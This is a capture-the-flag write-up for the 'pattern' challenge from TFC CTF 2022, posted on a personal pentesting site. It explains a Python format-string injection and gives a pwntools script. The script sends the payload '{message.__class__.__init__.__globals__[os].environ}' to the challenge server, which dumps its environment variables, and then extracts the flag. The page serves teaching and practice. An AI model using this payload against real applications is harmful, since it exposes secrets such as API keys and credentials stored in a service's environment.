GeorgeBanu
  • About me
  • Pentesting CheatSheets
    • Information Gathering
    • Ports Enumeration
      • FTP-21
      • SSH-22
      • Telnet-23
      • SMTP - 25,465,587
      • DNS-53
      • NetBIOS, SMB - 139,445
      • SNMP-161
      • MySQL-3306
      • RDP-3389
      • WinRM-5985
    • Web Cheat Sheet
    • Privilege Escalation
      • Linux Enumeration
      • Linux Privesc Techniques
    • Tricks
    • Template
  • TryHackMe Writeups
    • Starter
    • Dreaming
    • ColddBox: Easy
    • Ollie
    • Blog
    • KoTH Hackers
    • Brooklyn Nine Nine
    • Chill Hack
    • Undiscovered
    • Archangel
    • Jason
    • GLITCH
    • VulnNet: Node
    • Road
    • VulnNet:Internal
    • W1seGuy
  • CyberEDU Writeups
    • flag-is-hidden
    • file-crawler
    • reccon
    • this-file-hides-something
    • wifiland
    • old-tickets
    • inodat
    • pattern
    • ultra-crawl
  • eJPT
Powered by GitBook
On this page
  1. CyberEDU Writeups

pattern

This task was part of the TFC CTF 2022 competition.

This is a basic command injection challenge. Just review the provided source code, and you'll find that you need to exploit the message object of Message class.

The source code shows that the __repr__ method is being set to the same function as __str__. This means that when repr(message) or str(message) is called, it returns the message string. So you need to manipulate how the message string is processed.

from pwn import * 
import re 

# avoid warnings when you run the python code
import warnings
warnings.filterwarnings("ignore")

server_IP = "34.107.71.117"
server_port = 30840

# Open connection
connection = remote(server_IP,server_port)
# payload used to get the flag
payload = '{message.__class__.__init__.__globals__[os].environ}'

# send payload
connection.sendlineafter("pattern> ",payload)
connection.sendlineafter("count> ",'1')


# get response and print the output 
response = connection.recvline()
#print(response.decode())

# Search for flag
flag = re.search(r'flag\{.*?\}', response.decode())
if flag:
    print(f"Flag found: {flag.group(0)}")
else:
    print("Flag not found.")

# close the connection
connection.close()
PreviousinodatNextultra-crawl

Last updated 8 months ago